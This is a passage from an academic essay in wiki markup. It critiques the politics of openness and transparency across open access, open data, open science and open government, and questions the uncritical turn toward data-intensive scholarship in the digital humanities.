&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; In particular, ''Digitize Me, Visualize Me, Search Me'' suggests that the turn in the humanities toward data-driven scholarship, science visualization, statistical data analysis, etc. can be placed alongside all those discourses that are being put forward at the moment - in both the academy and society - in the name of greater openness, transparency, efficiency and accountability. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''Open Access ''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The open access movement provides a case in point. Witness [http://www.knowledge-exchange.info/Admin/Public/DWSDownload.aspx?File=%2fFiles%2fFiler%2fdownloads%2fOA_What_are_the_economic_benefits_-_a_comparison_of_UK-NL-DK__FINAL_logos.pdf John Houghton’s] 2009 comparison of the benefits of OA for the United Kingdom, Netherlands and Denmark, which claims to show that the open access academic publishing model, in which peer reviewed scholarly research and publications are made available for free online to all those who are able to access the Internet, is actually the most cost effective mechanism for scholarly publishing. Others meanwhile have detailed the increases open access publishing enables in the amount of material that can be published, searched and stored, in the number of people who can access it, in the impact of that material, the range of its distribution, and in the speed and ease of reporting and information retrieval. The following announcement, posted on the BOAI (Budapest Open Access Initiative) list in March 2010, is fairly typical in this respect: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Today PLoS released Pubget links across its journal sites. Now, when users are browsing thousands of reference citations on PLoS journals they will be able to get to the full text article faster than ever before. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Specifically, when readers encounter citations to articles as recorded by CrossRef (which are accessed via the ‘CrossRef’ link in the ‘Cited in’ section of any article’s Metrics tab), a PDF icon will also appear if it is freely available via Pubget. Clicking on the icon will take you directly to the PDF. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; On launching this new functionality, Pete Binfield, Publisher of PLoS ONE and the Community Journals said: ‘Any service, like Pubget, that makes it easier for authors to quickly find the information they need is a welcome addition to our articles. We like how Pubget helps to break down content walls in science, letting users get instantly to the article-level detail that they seek.’ (Pubget, 2010)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''Open Data ''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Yet it is not just the research literature that is positioned as being rendered more accessible by scientists. Even the data created in the course of scientific research is promoted as being made freely and openly available for others to use, analyse and build upon.This includes data sets that are too large to be included in any resulting peer-reviewed publications. Known as open data, or data-sharing, this initiative is motivated by the idea that publishing data online on an open basis bestows it with a [http://eprints.ecs.soton.ac.uk/17424/1/Swan_-_NERC_09.pptx ‘vastly increased utility’]. Digital data sets are said to be ‘easily passed around’; they are seemingly ‘more easily reused’, reanalysed and checked for accuracy and validity; and they supposedly contain more ‘opportunities for educational and commercial exploitation’ (Swan, 2009). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Interestingly, certain academic publishers are already viewing the linking of their journals to the underlying data as another of the ‘value-added’ services they can offer, to set alongside automatic alerting and sophisticated citation, indexing, searching and linking facilities (and to no doubt help ward off the threat of disintermediation posed by the development of digital technology, which enables academics to take over the means of dissemination and publish their work for and by themselves cheaply and easily). Significantly, a [http://www.jisc.ac.uk/publications/documents/opensciencerpt.aspx 2009 JISC report] also identified ‘open-ness, predictive science based on massive data volumes and citizen involvement as [all] being important features of tomorrow’s research practice’. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; In a further move in this direction, all Public Library of Science (PLoS) journals are now providing a broad range of article-level metrics and indicators relating to usage data on an open basis. No longer withheld as trade secrets, these metrics reveal which articles are attracting the most views, citations from the scholarly literature, social bookmarks, coverage in the media, comments, responses, ‘star’ ratings, blog coverage, and so on. PLoS has positioned this programme as enabling science scholars to assess [http://blogs.plos.org/plos/2009/09/article-level-metrics-at-plos-addition-of-usage-data/ ‘research articles on their own merits rather than on the basis of the journal (and its impact factor) where the work happens to be published’], and they encourage readers to carry out their own analyses of this open data (Patterson, 2009). Yet it is difficult not to perceive such article-level metrics and management tools as also being part of the wider process of transforming knowledge and learning into ‘quantities of information’ (Lyotard, 1986: 4); quantities, furthermore, that are produced more to be exchanged, marketed and sold (1986: 4) – for example, by individual academics to their departments, institutions, funders and governments in the form of indicators of ‘quality’ and ‘impact’ (1986: 5). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''From Open Science to Open Government ''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Such developments around open access and open data are themselves part of the larger trend or phenomenon that is coming to be known as ‘open science’. As Murray et al put it: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Open science is emerging as a collaborative and transparent approach to research. It is the idea that all data (both published and unpublished) should be freely available, and that private interests should not stymie its use by means of copyright, intellectual property rights and patents. It also embraces open access publishing and open source software… (Murray et al, 2008)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; One of the most interesting and well known examples of how such open science may work is provided by the Open Notebook Science of the organic chemist Jean-Claude Bradley. ‘[I]in the interests of openness’, Bradley is making the [http://www.infotoday.com/IT/sep10/Poynder.shtml ‘details of every experiment done in his lab freely available on the web']. This ‘includes all the data generated from these experiments too, even the failed experiments’. What is more, he is doing so in ‘real time’, ‘within hours of production, not after the months or years involved in peer review’ (Poynder, 2010). Again, we can see how emphasis is being placed on the amount of research that can be shared, and the speed with which this can be achieved. This openness on Bradley’s part is also positioned as a means of achieving usefulness and impact, as is evident from the very title of one of his Open Notebook Science projects, [http://usefulchem.wikispaces.com/ UsefulChem]. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; To be fair, however, such discourses around openness, transparency, efficiency and utility are not confined to the sciences – or even the university, for that matter. There are also wider political initiatives, dubbed ‘Open Government’, or ‘Government 2.0’, with both the Labour and the Conservative/Liberal Democrat coalition administrations in the UK making a great display of freeing government information. The Labour government implemented the Freedom of Information (FOI) Act in 2000, and then proceeded to launch a [http://www.data.gov.uk website] expressly dedicated to the release of governmental data sets in January 2010. It is a website that the current Conservative/Liberal Democrat coalition government continues to make extensive use of. In a similar vein, the [http://www.freeourdata.org.uk/ Guardian] newspaper has campaigned for the UK government to relinquish its copyright on all local, regional and national data collected with taxpayers’ money and to make such data freely and openly available to the public by publishing it online, where it can be collectively and collaboratively scrutinized, searched, mined, mapped, graphed, cross-tabulated, visualized, audited and interpreted using software tools. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Nor is this phenomenon confined to the UK. In the United States Barack Obama promised throughout his election campaign to make government more open. He followed this up by issuing a memorandum on transparency the very first day after he became President, vowing to make openness one of [http://www.nytimes.com/2009/01/22/us/politics/22obama.html ‘the touchstones of this presidency’”] (Obama, cited in Stolberg, 2009): ‘[http://www.whitehouse.gov/the_press_office/TransparencyandOpenGovernment/ My Administration] is committed to creating an unprecedented level of openness in Government. We will work together to ensure the public trust and establish a system of transparency, public participation, and collaboration. Openness will strengthen our democracy and promote efficiency and effectiveness in Government’ (The White House, 2009). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''The Politics of Openness''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The connection I am making here between the movements for open access, open data, open science and open government is one that has to a certain extent already been pointed to by Michael Gurstein in his reflections on the experience of attending the 2011 conference of the [http://okfn.org/ Open Knowledge Foundation]. For Gurstein: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;[http://gurstein.wordpress.com/2011/07/03/are-the-open-data-warriors-fighting-for-robin-hood-or-the-sheriff-some-reflections-on-okcon-2011-and-the-emerging-data-divide/ the ‘open data/open government’ movement] begins from a profoundly political perspective that government is largely ineffective and inefficient (and possibly corrupt) and that it hides that ineffectiveness and inefficiency (and possible corruption) from public scrutiny through lack of transparency in its operations and particularly in denying to the public access to information (data) about its operations. And further that this access once available would give citizens the means to hold bureaucrats (and their political masters) accountable for their actions. In doing so it would give these self-same citizens a platform on which to undertake (or at least collaborate with) these bureaucrats in certain key and significant activities—planning, analyzing, budgeting that sort of thing. Moreover through the implementation of processes of crowdsourcing this would also provide the bureaucrats with the overwhelming benefits of having access to and input from the knowledge and wisdom of the broader interested public. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Put in somewhat different terms but with essentially the same meaning—it’s the taxpayer’s money and they have the right to participate in overseeing how it is spent. Having “open” access to government’s data/information gives citizens the tools to exercise that right. (Gurstein, 2011)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Interestingly, for Gurstein, a much clearer understanding is needed than has been displayed by many open data/open government advocates to date of what exactly is meant by openness, and of where arguments in favour of open access, open information and open data are likely to lead us in the not too distant future. With this in mind, we could endeavour to put some flesh on the bones of Gurstein’s sketch of the politics of openness and suggest that, from a liberal perspective, freeing publicly funded and acquired information and data – whether it is gathered directly in the process of census collection, or indirectly as part of other activities (crime, healthcare, transport, schools and accident statistics) – is seen as helping society to perform more efficiently. For liberals, openness is said to play a key role in increasing citizen trust, participation and involvement in democracy, and indeed government, as access to information – such as that needed to intervene in public policy – is no longer restricted either to the state or to those corporations, institutions, organizations and individuals who have sufficient money and power to acquire it for themselves. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Such liberal beliefs find support in the idea that making information and data freely and transparently available goes along with Article 19 of The Universal Declaration of Human Rights. The latter states that everyone has the right [http://www.un.org/en/documents/udhr/index.shtml ‘to seek, receive and impart information and ideas through any media and regardless of frontiers’]. Hillary Clinton, the United States Secretary of State, put forward a similar vision when, at the beginning of 2010, she said of her country that ‘[http://www.foreignpolicy.com/articles/2010/01/21/internet_freedom?page=full We stand for a single internet] where all of humanity has equal access to knowledge and ideas’, and against the authoritarian censorship and suppression of free speech and online search facilities like Google in countries such as China and Iran. Clinton declared: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;[http://www.foreignpolicy.com/articles/2010/01/21/internet_freedom?page=full Even in authoritarian countries], information networks are helping people discover new facts and making governments more accountable. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; During his visit to China in November [2009], President Obama held a town hall meeting with an online component to highlight the importance of the internet. In response to a question that was sent in over the internet, he defended the right of people to freely access information, and said that the more freely information flows, the stronger societies become. He spoke about how access to information helps citizens to hold their governments accountable, generates new ideas, and encourages creativity. The United States' belief in that truth is what brings me here today. (Clinton, 2010)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; This political sentiment was shared by Jeff Jarvis, author of ''What Would Google Do?'', when, in support of Google’s decision to stop self-filtering search results in China, he argued in March 2010 for a bill of rights for cyberspace: ‘[http://www.buzzmachine.com/2010/03/27/a-bill-of-rights-in-cyberspace/ to claim and secure our freedom] to connect, speak, assemble, and act online; to each control our identities and data; to speak our languages; to protect what is public and private; and to assure openness’ (Jarvis, 2010: 4). Yet are Clinton and Jarvis not both guilty here of overlooking (or should that be conveniently forgetting or even denying) the way liberal ideas of freedom and openness (and, indeed, of the human) have long been used in the service of colonialism and neoliberal globalisation? Does freedom for the latter not primarily mean economic freedom, i.e., freedom of the market, freedom of the consumer to choose what to consume – not only in terms of goods, but also lifestyles and ways of being? &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Even if it was before the widespread use of networked computers, it is interesting that ‘fifteen years after the Freedom of Information Act law was passed’ in the US in 1966, ‘the General Accounting Office reported that 82 percent of requests [for information] came from business, nine percent from the press, and only 1 percent from individuals or public interest groups’ (Fung et al, 2007: 27-28). Certainly, in the UK today, the 'truth is that the [UK] FOI Act [2000] isn't used, for the most part, by “the people”’, as Tony Blair acknowledged in his recent memoir. ‘It's used by journalists’ (Blair, 2010) – and by businesses, one might add. In view of this, it is no surprise to find that neoliberals also support the making of government data freely and openly available to businesses and the public. They do so on the grounds that it provides a means of achieving the best possible ‘input/output ratio’ for society (Lyotard, 1986: 54). This way of thinking is of a piece with the emphasis placed by neoliberalism’s audit culture on accountability, transparency, evaluation, measurement and centralised data management: for example, in the context of UK higher education, it is evident in the emphasis placed on measuring the impact of research on society and the economy, teaching standards, contact hours, as well as student drop-out rates, future employment destinations and earning prospects. From this perspective, such openness and communicative transparency is perceived as ensuring greater value for (taxpayers’) money, supposedly helping to eliminate corruption, enabling costs to be distributed more effectively, and increasing choice, innovation, enterprise, creativity, competiveness and accountability. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Meanwhile, some libertarians have gone so far as to argue that there is no need to make difficult policy decisions about what data and what information it is right to publish online and what to keep secret at all. Instead, we should work toward the kind of situation the science-fiction writer Bruce Sterling proposes. In ''Shaping Things'', his non-fiction book on the future of design, Sterling advocates retaining all data and information, ‘the known, the unknown known, and the unknown unknown’, in large archives and databases equipped with the necessary bandwidth, processing speed and storage capacity, and simply devising search tools and metadata that are accurate, fast and powerful enough to find and access it (Sterling, 2005: 47). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Yet to have participated in the shift away from questions of truth, justice and especially what, in ''The Inhuman'', Lyotard places under the headings of ‘heterogeneity, dissensus, event…the unharmonizable’ (1991: 4), and ''toward'' a concern with performativity, measurement and optimising the relation between input and output, one does not need to be a practicing [http://www.guardian.co.uk/news/datablog/2010/nov/09/canada-open-data data journalist], or to have actively contributed to the movements for open access, open data, open science or open government. If you are one of the 1.3 million plus people who have purchased a Kindle, and helped the sale of digital books outpace those of hardbacks on Amazon’s US website, then you have already signed a license agreement allowing the online book retailer - but not academic researchers or the public - to collect, store, mine, analyse and extract economic value from data concerning your personal reading habits for free. Similarly, if you are one of the over 687 million worldwide who use the Facebook social network, then you are already voluntarily giving your time and labour for free, not only to help its owners, their investors, and other companies make a reputed $1 billion a year from demographically targeted advertising, but to supply law enforcement agencies with profile data relating to yourself, your family, friends, colleagues and peers that they can [http://www.eff.org/deeplinks/2010/03/eff-posts-documents-detailing-law-enforcement use in investigations] (Hoffman, 2010). Even if you have done neither, you will in all probability have provided the Google technology company with a host of network data and digital traces it can both monetize and give to the police as a result of having mapped your home, digitized your book, or supplied you with free music videos to enjoy via Google Street View, Google Maps, Google Earth, Google Book Search and YouTube, which Google also owns. Lest this shift from open access to Google should seem somewhat farfetched, it is worth recalling that ‘[http://www.nea.org/assets/img/PubAlmanac/ALM_09_06.pdf Google has moved to establish, embellish, or replace many core university services] such as library databases, search interfaces, and e-mail servers’ (Vaidhyanathan, 2009: 65-66); and that academia in fact gave birth to Google, Google’s PageRank algorithm being little more [http://journalofjournalperformancestudies.org/journal/index.php/jjps/article/view/6/6 ‘than an expansion of what is known as citation analysis’] (Knouf, 2010). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;youtube&amp;gt;R7yfV6RzE30&amp;lt;/youtube&amp;gt; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Obviously, no matter how exciting and enjoyable such activities may be, you don't ''have'' to buy that e-book reader, join that social network or display your personal metrics online, from sexual activity to food consumption, in an attempt to identify patterns in your life – what is called life-tracking or self-tracking. (Although, actually, a lot of people are quite happy to keep contributing to the networked communities reached by Facebook and YouTube, even though they realise they are being used as free labour and that, in the case of the former, much of what they do cannot be accessed by search engines and web browsers. They just see this as being part of the deal and a reasonable trade-off for the services and experiences that are provided by these companies.) Nevertheless, refusing to take part in this transformation of knowledge and learning into quantities of data, and shift ''away'' from critical questions of what is just and right ''toward'' a concern with optimizing the system’s performance is not an option for most of us. It is not something that can be opted out of by simply declining to take out a Tesco Club Card or use cash-points, refusing to look for research using Google Scholar, or committing social networking [http://www.suicidemachine.org/ ‘suicide’] and reading print-on-paper books instead. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; For one thing, the process of capturing data by means not just of the internet, but a myriad of cameras, sensors and robotic devices, is now so ubiquitous and all pervasive it is impossible to avoid being caught up in it, no matter how rich, knowledgeable and technologically proficient you are. The latest research indicates there are approximately 1.85 million CCTV cameras in the UK – one for every 32 people. Yet no one really knows how many CCTV cameras are actually in operation in Britain today - and that’s without even mentioning other means of gathering data that are reputed to be more intrusive still, such as mobile phone GPS location and automatic vehicle number plate recognition (ANPR). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; For another, and as the example of CCTV illustrates, it’s not necessarily a question of actively doing something in this respect: of positively contributing free labour to the likes of Flickr and YouTube, for instance, or of refusing to do so. Nor is it merely a case of the separation between work and non-work being harder to maintain nowadays. (Is it work, leisure or play when you are writing a status update on Facebook, posting a photograph, ‘friending’ someone, interacting, detailing your ‘likes’ and ‘dislikes’ regarding the places you eat, the films you watch, the books you read?) As Gilles Deleuze and Felix Guattari pointed out some time ago, ‘surplus labor no longer requires labor... one may furnish surplus-value without doing any work’, or anything that even remotely resembles work for that matter, at least as it is most commonly understood: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;In these new conditions, it remains true that all labour involves surplus labor; but surplus labor no longer requires labor. Surplus labor, capitalist organization in its entirety, operates less and less by the striation of space-time corresponding to the physicosocial concept of work. Rather, it is as though human alienation through surplus labor were replaced by a generalized ‘machinic enslavement’, such that one may furnish surplus-value without doing any work (children, the retired, the unemployed, television viewers, etc.). Not only does the user as such tend to become an employee, but capitalism operates less on a quantity of labor than by a complex qualitative process bringing into play modes of transportation, urban models, the media, the entertainment industries, ways of perceiving and feeling – every semiotic system. It is as though, at the outcome of the striation that capitalism was able to carry to an unequalled point of perfection, circulating capital necessarily recreated, reconstituted, a sort of smooth space in which the destiny of human beings is recast. ((Deleuze and Guattari, 1988: 492)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''Transparency?''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Before going any further, I should perhaps confess that I am a staunch advocate of open access in the humanities. Nevertheless, there are a number of issues that need to be raised with regard to making research and data openly available online for free. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The first point to make in this respect is that, far from revealing any hitherto unknown, hidden or secret knowledge, such discourses of openness and transparency are themselves often not very open or transparent. Staying with the relationship between politics and science, let us take as an example the response of Ed Miliband, leader of the UK’s Labour Party, to the [http://en.wikipedia.org/wiki/Climatic_Research_Unit_email_controversy 'Climategate']controversy, in which climate skeptics alleged that emails hacked from the University of East Anglia’s Climatic Research Unit revealed that scientists have tampered with the data in order to support the theory that global warming is man-made. Miliband’s answer was to advocate ‘[http://www.express.co.uk/posts/view/144551/Global-warming-Brits-deny-humans-are-to-blame maximum transparency]– let’s get the data out there’, he urged. ‘The people who believe that climate change is happening and is man-made have nothing to fear from transparency’ (Miliband, quoted in Westcott, 2009: 7; cited by Birchall,&amp;amp;nbsp;2011b). Yet, actually, complete transparency is impossible. This is because, as Clare Birchall has shown, there is an aporia at the heart of any claim to transparency. ‘For transparency to be known as transparency, there must be some agency (such as the media [or politicians, or government]) that legitimizes it as transparent, and because there is a legitimizing agent which does not itself have to be transparent, there is a limit to transparency’ (Birchall,&amp;amp;nbsp;2011a: 142). In fact, the more transparency is claimed, the more the violence of the mediating agency of this transparency is concealed, forgotten or obscured. Birchall offers the example of ‘The Daily Telegraph and its exposure of MPs’ expenses during the summer of 2009. While appearing to act on the side of transparency, as a commercial enterprise the paper itself has in the past been subject to secret takeover bids and its former owner, Lord Conrad Black, convicted of fraud and obstructing justice’ (Birchall,&amp;amp;nbsp;2011a: 142). To paraphrase a question from Lyotard I am going to return to at more length: Who decides what transparency is, and who knows what needs to be transparent (1986: 9)? &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Furthermore, merely making such information and data available to the public online will not in itself necessarily change anything. In fact, such processes have often been adopted precisely as a means of avoiding change. Aaron Swartz provides the example of Watergate: ‘[http://www.aaronsw.com/weblog/usefultransparency after Watergate], people were upset about politicians receiving millions of dollars from large corporations. But, on the other hand, corporations seem to like paying off politicians. So instead of banning the practice, Congress simply required that politicians keep track of everyone who gives them money and file a report on it for public inspection’ (Swartz, 2010). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''Openness?''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Much the same can be said for the idea that making research and data accessible to the public supposedly helps to make society more open and free. Take the belief we saw expressed above by Hilary Clinton: that people in the United States have free access to the internet while those in China and Iran do not. Those of us who live and work in the West do indeed have a certain freedom to publish and search online. Yet none of this rhetoric about freedom and transparency prevented the Obama government from condemning Wikileaks in November 2010 as [http://www.msnbc.msn.com/id/40405589/ns/us_news-security ‘reckless and dangerous’], after it opened up access to hundreds of thousands of classified State Department documents (Gibbs, 2010); nor from putting pressure on Amazon and other companies to stop hosting the whistle-blowing website, an action which had echoes of the dispute over censorship between Google and the Chinese government earlier in 2010. (Significantly, the Obama administration has also recently withdrawn the bulk of funding from the United States open government website www.data.gov, which served as an influential precursor to the previously mentioned [http://www.data.gov.uk www.data.gov.uk] website in the UK.) Furthermore, unless you are a large political or economic actor, or one of the lucky few, the statistics show that what you publish online is unlikely to receive much attention. Just ‘three companies – Google, Yahoo! and Microsoft – handle 95 percent of all search queries’; while ‘for searches containing the name of a specific political organisation, Yahoo! and Google agree on the top result 90 percent of the time’ (Hindman, 2009: 59, 79). Meanwhile, one company, Google, reportedly has 65&amp;amp;nbsp;% of the world’s search market, ‘72 per cent share of the US search market, and almost 90 per cent in the UK’ – a degree of domination that has led the European Union to investigate Google for abusing its power to favour its own products while suppressing those of rivals (Arthur, 2010: 3). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; But it is not just that Google’s algorithms are ranking some websites on the first page of its results and others on page 42 (which means, in effect, that the latter are rarely going to be accessed, since very few people read beyond the first page of Google’s results). It is that conventional search engines are reaching only an extremely small percentage of the total number of available web pages. Ten years ago Michael K. Bergman was already placing the figure at 0.03%, or [http://quod.lib.umich.edu/cgi/t/text/text-idx?c=jep;view=text;rgn=main;idno=3336451.0007.104 ‘one in 3,000’], with ‘public information on the deep Web’ even then being ‘400 to 550 times larger than the commonly defined World Wide Web’. Consequently, while according to Bergman as much as ‘ninety-five per cent of the deep Web’ may be ‘publicly accessible information – not subject to fees or subscriptions’ – by far the vast majority of it is left untouched (Bergman, 2001). And that is before we even begin to address the issue of how the recent rise of the app, and use of the password protected Facebook for search purposes, may today be [http://www.wired.com/magazine/2010/08/ff_webrip/ annihilating the very idea of the openly searchable Web]. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; We can therefore see that it is not enough simply to [http://www.freeourdata.org.uk/ ‘Free Our Data’], as the Guardian has it; or to operate on the basis that ‘information wants to be free’ (Wark, 2004) (although doing so of course may be a start, especially in an era when notions of the open web and net neutrality are under severe threat). We can put ever more research and data online; we can make it freely available to both other researchers and the public under open access, open data, open science and open government conditions; we can even integrate, index and link it using the appropriate metadata to enable it to be searched and harvested with relative ease. But none of this means this research and data is going to be found. Ideas of this kind ignore the fact that all information and data is ordered, structured, selected and framed in a particular way. This is what metadata is for, after all. Metadata is information or data that describes, links to, or is otherwise used to control, find, select, filter, classify and present other data. One example would be the information provided at the front of a book detailing its publisher, date and place of publication, ISBN number, and so on. However, the term ‘metadata’ is most commonly associated with the language of computing. There, metadata is what enables computers to access files and documents, not just in their own hard drives, but potentially across a range of different platforms, servers, websites and databases. Yet for all its associations with computer science, metadata is never neutral or objective. Although the term ‘data’ comes from the Latin word datum, meaning [http://www.collinslanguage.com/results.aspx?context=3&amp;amp;reversed=False&amp;amp;action=define&amp;amp;homonym=-1&amp;amp;text=datum ‘something given’], data is not simply objectively out there in the world already provided for us. The specific ways in which metadata is created, organized and presented helps to produce (rather than merely passively reflect) what is classified as data and information – and what is not. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Clearly, then, it is not just a question of free and open access to the research and data; nor of providing support, education and training on how to understand, interpret, use and apply it effectively, as [http://gurstein.wordpress.com/2010/09/02/open-data-empowering-the-empowered-or-effective-data-use-for-everyone/ Gurstein] has argued (2010). It is also a question of who (and what) makes decisions regarding the data and metadata, and thus gets to exercise control over it, and on what basis such decisions are made. To paraphrase Lyotard once more: who decides what data and metadata is, and who knows what needs to be decided?’ (1986: 9). Who gets to legislate? And who legitimates the legislators (1986: 8)? Will the ‘ruling class’ – top civil servants and consulting firms full of people with MBAs, ‘corporate leaders, high-level administrators, and the heads of the major professional, labor, political, and religious organizations’, including those behind Google, Apple, Facebook, Amazon, JISC, AHRC, OAI, SPARC, COASP – continue to operate as the class of interpreters, gatekeepers and ‘decision makers,’ not just with regard to having ‘access to the information these machines must have in storage to guarantee that the right decisions are made’, but with regard to creating and controlling the data and metadata, too (1986: 14)? &amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''On Data-Intensive Scholarship''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; If, as demonstrated above, discourses of openness and transparency are themselves not very open or transparent at all, much of the current emphasis on making the research and data open and free is also lacking in self-reflectivity and meaningful critique. We can see this not just in those discourses associated with open access, open data, open science and open government that are explicitly emphasizing the importance of transparency, performativity and efficiency. This lack of criticality is apparent in much of what goes under the name of ‘digital humanities’, too, especially those elements associated with the ‘computational turn’. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; We tend to think of the humanities as being self-reflexive per se, and as frequently asking questions capable of troubling culture and society. Yet after decades when humanities scholarship made active use of a variety of critical theories – Marxist, psychoanalytic, post-colonialist, post-Marxist – it seems somewhat surprising that many advocates of this current turn to data-intensive scholarship in the humanities find it difficult to understand computing and the digital as much more than tools, techniques and resources. As a result, much of the scholarship that is currently occurring under the ‘digital humanities’ agenda is uncritical, naive and at times even banal ([http://liu.english.ucsb.edu/where-is-cultural-criticism-in-the-digital-humanities Liu], 2011; [http://www.tannerhiggin.com/2010/05/cultural-politics-critique-and-the-digital-humanities/ Higgen], 2010). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Witness the current emphasis on making the data not only visible but also visual. Stefanie Posavec’s frequently referred to [http://www.itsbeenreal.co.uk/index.php?/wwwords/literary-organism/ Literary Organism], which visualises the structure of Part One of Kerouac’s ''On the Road'' as a tree, provides one example; those cited earlier courtesy of Lev Manovich and the Software Studies Initiative offer another. Now, there is a long history of critical engagement within the humanities with ideas of the visual, the image, the spectacle, the spectator and so on: not just in critical theory, but also in cultural studies, women’s studies, media studies, film and television studies. Such a history of critical engagement stretches back to Guy Debord’s influential 1967 work, ''The Society of the Spectacle'', and beyond. For example, in his introduction to a 1995 book edited with Lynn Cooke, ''Visual Display: Culture Beyond Appearances'', Peter Wollen writes that an excess of visual display within culture has 'the effect of concealing the truth of the society that produces it, providing the viewer with an unending stream of images that might best be understood, not simply detached from a real world of things, as Debord implied, but as effacing any trace of the symbolic, condemning the viewer to a world in which we can see everything but understand nothing—allowing us viewer-victims, in Debord’s phrase, only &amp;quot;a random choice of ephemera&amp;quot;’ (1995: 9). It can come as something of a surprise, then, to discover that this humanities tradition in which ideas of the visual are engaged critically appears to have had comparatively little impact on the current enthusiasm for data visualisation that is so prominent an aspect of the turn toward data-intensive scholarship. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Of course, this (at times explicit) repudiation of criticality could be precisely what makes certain aspects of the digital humanities so seductive for many at the moment. Exponents of the computational turn can be said to be endeavouring to avoid conforming to accepted (and often moralistic) conceptions of politics that have been decided in advance, including those that see it only in terms of power, ideology, race, gender, class, sexuality, ecology, affect etc. Refusing to [http://www.uchicago.edu/research/jnl-crit-inq/issues/v30/30n2.Latour.html ‘go through the motions of a critical avant-garde’], to borrow the words of Bruno Latour (2004), they often position themselves as responding to what is perceived as a fundamentally new cultural situation, and to the challenge it represents to our traditional methods of studying culture, by avoiding conventional theoretical manoeuvres and by experimenting with the development of fresh methods and approaches for the humanities instead. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Manovich, for instance, sees the sheer scale and dynamics of the contemporary new media landscape as presenting the usually accepted means of studying culture that were dominant for so much of the 20th century – the kinds of theories, concepts and methods appropriate to producing close readings of a relatively small number of texts – with a significant practical and conceptual challenge. In the past, ‘[http://lab.softwarestudies.com/2010/03/cultural-analytics-lecture-by-manovich.html cultural theorists and historians could generate theories and histories] based on small data sets (for instance, “classical Hollywood cinema”, “Italian Renaissance”, etc.) But how can we track “global digital cultures”, with their billions of cultural objects, and hundreds of millions of contributors’, he asks (Manovich, 2010)? Three years ago Manovich was already describing the ‘numbers of people participating in social networks, sharing media, and creating user-generated content’ as simply ‘astonishing’: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;[http://www.hpcwire.com/features/The_Next_Big_Thing_in_Humanities_Arts_and_Social_Science_Computing_Cultural_Analytics.html MySpace, for example,] claims 300 million users. Cyworld, a Korean site similar to MySpace, claims 90 percent of South Koreans in their 20s and 25 percent of that country's total population (as of 2006) use it. Hi5, a leading social media site in Central America has 100 million users and Facebook, 14 million photo uploads daily. The number of new videos uploaded to YouTube every twenty-four hours (as of July 2006): 65,000. (Manovich in Franklin &amp;amp;amp; Rodriguez’G, 2008)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
